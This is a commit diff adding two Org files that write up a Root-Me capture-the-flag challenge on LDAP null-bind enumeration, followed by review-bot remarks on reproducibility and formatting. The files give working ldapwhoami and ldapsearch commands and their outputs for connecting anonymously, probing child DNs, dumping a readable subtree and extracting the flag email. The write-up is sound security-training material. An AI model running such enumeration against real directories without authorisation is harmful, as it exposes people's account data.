feat ldap-null-bind
Signed-off-by: Tuan-Dat Tran <tuan-dat.tran@dextradata.com>
81
network/lda-null-bind/explaination.org
Normal file
@@ -0,0 +1,81 @@
|
||||
* LDAP null-bind challenge explained simply
|
||||
|
||||
Think of LDAP like a big company phonebook/tree.
|
||||
|
||||
Each node in the tree is a folder or a person record:
|
||||
|
||||
#+begin_example
|
||||
dc=challenge01,dc=root-me,dc=org
|
||||
|
|
||||
+-- ou=anonymous
|
||||
|
|
||||
+-- uid=sabu
|
||||
+-- mail: sabu@anonops.org
|
||||
#+end_example
|
||||
|
||||
In this challenge, the server allows *anonymous login* (called a null bind).
|
||||
That means we can connect without a username/password and ask some questions.
|
||||
|
||||
** What we did (step by step)
|
||||
|
||||
1) Checked if anonymous access works
|
||||
|
||||
#+begin_src bash
|
||||
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
|
||||
#+end_src
|
||||
|
||||
It returned `anonymous`, so null bind is enabled.
|
||||
|
||||
2) Tried to list everything from the main base DN
|
||||
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
#+end_src
|
||||
|
||||
Server replied with `Insufficient access`.
|
||||
|
||||
So: anonymous is allowed, but not everywhere.
|
||||
|
||||
3) Probed likely child branches under the base DN
|
||||
|
||||
We tested candidate DNs and found one readable branch:
|
||||
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
|
||||
#+end_src
|
||||
|
||||
That confirmed `ou=anonymous` exists and is accessible.
|
||||
|
||||
4) Enumerated that readable branch
|
||||
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
#+end_src
|
||||
|
||||
This returned a user record:
|
||||
|
||||
- `uid=sabu`
|
||||
- `mail: sabu@anonops.org`
|
||||
|
||||
So the requested email is:
|
||||
|
||||
*sabu@anonops.org*
|
||||
|
||||
** Why this works
|
||||
|
||||
- LDAP permissions are often set per branch (subtree).
|
||||
- Root/base queries may be blocked.
|
||||
- A specific subtree can still be world-readable.
|
||||
- Enumeration is about finding *where* read access is allowed.
|
||||
|
||||
** Tiny mental model
|
||||
|
||||
#+begin_example
|
||||
[Connect anonymously] --> [Test base DN] --blocked--> [Try child branches]
|
||||
|
|
||||
v
|
||||
[Find readable subtree]
|
||||
|
|
||||
v
|
||||
[Dump entries + get mail]
|
||||
#+end_example
|
||||
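Review bot: Step 3 of "What we did" says "We tested candidate DNs and found one readable branch" but records only the ldapsearch that succeeded, so a reader cannot reproduce how ou=anonymous was found; list the candidate DNs that were tried (or the wordlist they came from) and what the server answered for the ones that failed. Inline code in this file is wrapped in backticks (for example around anonymous and Insufficient access), which Org does not render as code; use =anonymous= or ~anonymous~ instead. The path network/lda-null-bind/explaination.org also looks like a typo for ldap-null-bind/explanation.org, given the commit subject "feat ldap-null-bind".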
61
network/lda-null-bind/notes.org
Normal file
@@ -0,0 +1,61 @@
|
||||
* LDAP - null bind
|
||||
** Notes
|
||||
- https://repository.root-me.org/RFC/EN%20-%20rfc4512.txt
|
||||
- https://stackoverflow.com/questions/18756688/what-are-cn-ou-dc-in-an-ldap-search
|
||||
** Task
|
||||
Aufgabe
|
||||
|
||||
Es scheint, dass einer der Anonymen einen neuen Zweig im LDAP-Verzeichnis erstellt hat, irgendwo in :
|
||||
dc=challenge01,dc=root-me,dc=org
|
||||
|
||||
Verschaffen Sie sich Zugang zu seinen Daten und erhalten Sie seine E-Mail-Adresse.
|
||||
Zugangsdaten für die Übung
|
||||
Host challenge01.root-me.org
|
||||
Protokoll TCP
|
||||
Port 54013
|
||||
|
||||
** Findings
|
||||
- Challenge type: LDAP anonymous/null bind enumeration.
|
||||
- Base DN: dc=challenge01,dc=root-me,dc=org
|
||||
- Target: find the branch created by an anonymous user and extract their email address.
|
||||
|
||||
** Useful tools
|
||||
- ldapsearch (required)
|
||||
- ldapwhoami (quick null-bind check)
|
||||
- openssl s_client (optional, for TLS troubleshooting)
|
||||
|
||||
** Recon commands
|
||||
#+begin_src bash
|
||||
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(mail=*)"
|
||||
#+end_src
|
||||
|
||||
** Execution log
|
||||
- Verified anonymous bind:
|
||||
#+begin_src bash
|
||||
ldapwhoami -x -H ldap://challenge01.root-me.org:54013
|
||||
# anonymous
|
||||
#+end_src
|
||||
|
||||
- Direct subtree query on base DN is blocked:
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
# result: 50 Insufficient access
|
||||
#+end_src
|
||||
|
||||
- Enumerated likely child DNs and found readable branch:
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" -s base "(objectClass=*)" dn
|
||||
# dn: ou=anonymous,dc=challenge01,dc=root-me,dc=org
|
||||
#+end_src
|
||||
|
||||
- Dumped subtree under readable branch:
|
||||
#+begin_src bash
|
||||
ldapsearch -x -H ldap://challenge01.root-me.org:54013 -b "ou=anonymous,dc=challenge01,dc=root-me,dc=org" "(objectClass=*)"
|
||||
# dn: uid=sabu,ou=anonymous,dc=challenge01,dc=root-me,dc=org
|
||||
# mail: sabu@anonops.org
|
||||
#+end_src
|
||||
|
||||
** Flag / answer
|
||||
- Email address: sabu@anonops.org
|
||||
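Review bot: The third command under "Recon commands", the "(mail=*)" search on the base DN, has no entry in "Execution log", so it is unclear whether it was also rejected with "50 Insufficient access" or returned something; record its result or drop the command. "Useful tools" lists openssl s_client for TLS troubleshooting, yet every command in the file uses plain ldap:// on port 54013, so either note that TLS was not involved or remove the entry. The "Task" text is in German while the rest of the file is in English, and the "Execution log" repeats the same four commands as explaination.org; consider keeping the commands in one file and linking to it from the other.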